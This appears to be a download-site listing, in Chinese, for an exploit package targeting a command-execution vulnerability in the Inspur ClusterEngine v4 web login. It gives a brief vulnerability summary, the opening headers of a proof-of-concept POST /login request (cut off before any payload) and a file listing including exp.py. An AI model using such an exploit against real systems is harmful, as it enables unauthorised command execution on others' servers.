文件名称:ClusterEngine_EXP:浪潮ClusterEngine v4 命令执行; 漏洞检测
文件大小:457KB
文件格式:ZIP
更新时间:2024-04-30 07:44:03
Python
浪潮 ClusterEngine命令执行 漏洞简介 浪潮集群管理ClusterEngine是专门为浪潮天梭系列HPC产品定制的一款作业管理软件。在web登录界面,通过精心构造后的命令,可执行任意命令。造成命令执行漏洞 漏洞复现 POC 执行uname POST /login HTTP/1.1 Host: x x x x:8443 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK
【文件预览】:
ClusterEngine_EXP-main
----.DS_Store(6KB)
----README.md(2KB)
----img()
--------2.png(193KB)
--------3.png(79KB)
--------1.png(187KB)
--------4.png(64KB)
----exp.py(2KB)